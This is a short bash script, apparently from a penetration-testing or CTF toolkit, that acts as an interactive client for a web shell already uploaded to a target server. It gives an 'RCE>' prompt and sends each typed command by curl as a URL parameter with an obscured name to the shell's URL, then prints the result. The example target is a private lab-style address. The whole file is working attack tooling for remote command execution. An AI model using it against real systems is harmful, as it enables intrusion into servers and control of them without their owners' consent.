#!/bin/bash

RED="\e[31m"
ENDCOLOR="\e[0m"

function help() {
    echo -e "Usage: webshell-handler <url>"

    echo -e "\nExample: webshell-handler 'http://10.10.11.34/uploads/shell.php'"
}

function error() {
    echo -e "${RED}[x]${ENDCOLOR} Error: $1"
}

if [[ "$1" == "-h" || "$1" == "--help" || "$2" == "-h" || "$2" == "--help" ]]; then
    help
    exit 0
fi

if [[ "$#" -ne 1 ]]; then
    error "No url provided"

    echo -e "\nUsage: webshell-handler <url>"
    exit 1
fi

while true; do
    echo -ne "${RED}RCE>${ENDCOLOR} "
    read -r cmd

    if [[ "$cmd" == "exit" ]]; then
        exit 0
    fi

    curl -q -k -G "$1" --data-urlencode "adda0a3d99480e6c29b065b1b0cd5319=${cmd}"
    echo ""
done
